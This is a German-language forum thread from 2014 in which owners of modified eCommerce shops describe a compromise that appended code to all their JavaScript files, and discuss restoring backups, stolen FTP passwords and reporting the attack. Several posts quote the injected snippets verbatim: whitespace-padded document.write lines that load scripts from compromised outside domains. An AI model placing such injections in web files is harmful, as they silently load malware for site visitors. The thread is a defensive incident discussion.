Managed Server
Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
    Spenden
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:
    Spenden
  • Thema: Shop gehackt - Umleitung auf c2consultores.com.ar

    digicam

    • Fördermitglied
    • Beiträge: 122
    Hallo Freunde,

    ich bin nicht sicher, ob es nur bei mir so ist, aber in den ganzen Javascript-Files steht ganz unten der Eintrag:
    Code: PHP  [Auswählen]
    /*9e2d00*/

                                                                                                                                                                                             /*rabgrabg09212rabg09*/

    document.write("<script type='text/javascript' src='http://c2consultores.com.ar/DQvZ6HwK.php?id=22720734'></"+ "script>");


    /*/9e2d00*/
     

    Schaut euch die ganzen js-Files unter /templates/xtc5/javascript/ mal an, hat jemand von euch auch diesen Eintrag?
    Ich werde die js-Files alle säubern und die Berechtigung 444 vergeben, vorher hatten die 644 gehabt.
    Gruß
    digicam


    Linkback: https://www.modified-shop.org/forum/index.php?topic=29534.0

    juergen-f

    • Neu im Forum
    • Beiträge: 37
    • Geschlecht:
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #1 am: 01. März 2014, 22:22:38
    Hi,

    du bist nicht der einzige, der im Moment mit diesem Sche... zu kämpfen hat....
    Bei mir haben sie in alle js-Dateien auf meinem Server (nicht nur in meinem Shop, sondern auch in allen anderen Projekten auf dem Server) mit folgenden Code verseucht:

    Code: PHP  [Auswählen]

    /*19f955*/

                                                                                                                                                                                             /*qbqb0904674qb09*/

    document.write("<script type='text/javascript' src='http://rouladenroessl.de/images/bmvfhkJ7.php?id='></"+ "script>");


    /*/19f955*/

     

    Habe ein Serverbackup eingespielt und alle Passwörter geändert. Mal sehen, wie lange es diesmal dauert, bis wieder was passiert.
    Letztes Jahr hatten die Penner alle index-Dateien beschmiert.

    Gruß

    Jürgen

    digicam

    • Fördermitglied
    • Beiträge: 122
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #2 am: 01. März 2014, 22:35:07
    Oh danke, ich dachte schon, dass nur ich wieder Pech habe. Wie haben es die bösen Buben geschafft? Ich hab die ganzen Server-Logs ausgewertet und nichts gefunden. Haben wir irgendwo einen Leck in der Modified?
    Gruß
    digicam

    Matt

    • Experte
    • Beiträge: 4.241
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #3 am: 01. März 2014, 22:57:41
    Vermutlich über ausgespähte FTP-Passwörter vom lokalen Rechner. Da der Schadcode so offensichtlich in den Files steht spricht das nicht dafür, dass man sich beim eigentlichen Angriff besonders viel Mühe gegeben hat.

    digicam

    • Fördermitglied
    • Beiträge: 122
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #4 am: 01. März 2014, 23:07:49
    Hi Matt, also meinst du dass ich trotz Virenscanner trotzdem einen Spion auf der Platte hab? Was kann ich dagegen tun?
    Danke
    digicam

    Matt

    • Experte
    • Beiträge: 4.241
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #5 am: 01. März 2014, 23:11:53
    Ja, das meine ich. Hast du mal das FTP-Log geprüft ob es da Logins zu Uhrzeiten gab, die unmöglich von dir sein können?

    Was du dagegen tun kannst? Gute Frage, das sind hier eher die Leute gefordert, die sich mit Windows auskennen. Ich würde aber mal nen anderen Virenscanner versuchen.

    juergen-f

    • Neu im Forum
    • Beiträge: 37
    • Geschlecht:
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #6 am: 01. März 2014, 23:22:18
    Über "meine" FTP-Passwörter kann der Angriff (eigendlich) nicht gekommen sein, da auch vermieteter Webspace betroffen war, wo ich die Passwörter nicht mal kenne.
    Irgendwie müssen die über das Server-Administratorpasswort auf den Server gekommen sein...
    Nur werden bei mir keine Passwörter gespeichert. Auch die Virenscanner können nichts finden. Habe eben einen neuen Scanner durchlaufen lassen. Der hat ein paar infizierte Dateien gefunden...

    Hoffe, auch die Datei, die Infos an diese Idioten schickt.....

    Jürgen

    Belamcando

    • Fördermitglied
    • Beiträge: 11
    • Geschlecht:
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #7 am: 01. März 2014, 23:38:10
    Hallo, bei mir steht nun überall Folgendes in den js-Dateien:

    /*ff3574*/
     /*pcpc092065pc09*/
    document.write("<script type='text/javascript' src='http://sisteweb.it/yjHKQkFt.php?id=20088487'></"+ "script>");
    /*/ff3574*/

    Nur kenne ich mich leider nicht so gut aus, dass ich damit so "cool" umgehen kann wie Ihr anscheinend. Wäre dankbar für einen Tipp bzw. wohl mehrere Tipps, wie ich den Unfug wieder los werde? Das fängt schon mal damit an, dass ich gerne wüsste, welche Dateien überhaupt betroffen sein können. Und was heisst alle PW ändern? Auch das DB-Passwort? Dann muss die Shopkonfiguration auch neu gemacht werden, oder? PW für ftp-Zugang habe ich geändert, auch den Zugang zu phpmyadmin und das Admin-PW vom Shop selber. Die Sache macht mich gerade etwas nervös ...

    Besten Dank schonmal,
    Belamcando

    digicam

    • Fördermitglied
    • Beiträge: 122
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #8 am: 01. März 2014, 23:54:35
    Hallo Belamcando, so wie ich es sehe kommst du um eine Wiederherstellung aus deinem letzten Backup nicht herum. Bis jetzt habe ich alle js-Dateien mit dem heutigen Datum gefunden, die infiziert waren, also nicht nur im Template, sondern auch im /admin/includes/
    Gruß
    digicam

    digicam

    • Fördermitglied
    • Beiträge: 122
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #9 am: 02. März 2014, 00:48:34
    Benutzt einer vielleicht in Firefox das Add-On S3.Download Statusbar? Ich habe das Add-On in Verdacht, dass es meine gespeicherten Passwörter weiter gesendet hat. Kann es hier ein Betroffener bestätigen?
    Danke
    digicam

    Bonner

    • Fördermitglied
    • Beiträge: 848
    • Geschlecht:
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #10 am: 02. März 2014, 10:36:15
    Wie es scheint, bin ich ja nicht der Einzige der derzeit Probleme hat.

    Code: PHP  [Auswählen]
    ;

    /*f55735*/

                                                                                                                                                                                             /*ogajrogajr09883ogajr09*/

    document.write("<script type='text/javascript' src='http://ergotronics.de/rnH7Vpfx.php?id=28427126'></"+ "script>");


    /*/f55735*/
     

    Hatte gestern ja auch eigentlich nix vor ....

    Nach meinen Recherchen sind wohl alle Javascript Dateien befallen.

    Alles platt gemacht, Backup eingespielt und es lief wieder.

    Dann habe ich mich mal auf die Suche gemacht, wohin der ganze Mist geroutet wird..ergotronics hat eine IP, die auf eine Serverfarm im Münchener Raum verweist.
    Wäre mal interessant zu wissen, wo bei den anderen Fällen die Server stehen.

    Im Gespräch mit meinem Hoster habe ich dann mal die Sicherheitseinstellungen verschärft, was für mich bei Änderungen zwar umständlicher ist, aber die Arbeit gestern brauch ich nicht öfter!

    Bonner

    Bonner

    • Fördermitglied
    • Beiträge: 848
    • Geschlecht:
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #11 am: 02. März 2014, 10:50:18
    Hab grad mal nachgeguckt...auch der Eintrag von jurgen-f verweist auf die gleicher Serverfarm

    Netbeat Domain Hosting Farm in München

    Bonner

    Gradler

    • Viel Schreiber
    • Beiträge: 2.083
    • Geschlecht:
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #12 am: 02. März 2014, 10:54:50
    Dann wäre es doch wohl an der Zeit für Strafanzeigen.

    Bonner

    • Fördermitglied
    • Beiträge: 848
    • Geschlecht:
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #13 am: 02. März 2014, 11:10:38
    Ich hatte mal dran gedacht, ev. das BSI zu kontaktieren.

    Gradler

    • Viel Schreiber
    • Beiträge: 2.083
    • Geschlecht:
    Re: Shop gehackt - Umleitung auf c2consultores.com.ar
    Antwort #14 am: 02. März 2014, 11:32:35
    Und jetzt willst Du warten bis die wieder so 'ne Webseite machen um dann durch Eintragung feststellen wollen ob Du auch wirklich gehackt wurdest?
    Werbung / Banner buchen
    5 Antworten
    3169 Aufrufe
    03. Dezember 2012, 23:54:09 von Zaldoran
    9 Antworten
    3943 Aufrufe
    15. Oktober 2013, 12:16:07 von jumpM
    14 Antworten
    6720 Aufrufe
    07. Januar 2010, 13:44:07 von BeBa
    2 Antworten
    3265 Aufrufe
    21. Juni 2014, 18:32:33 von hirnbeisser
               
    anything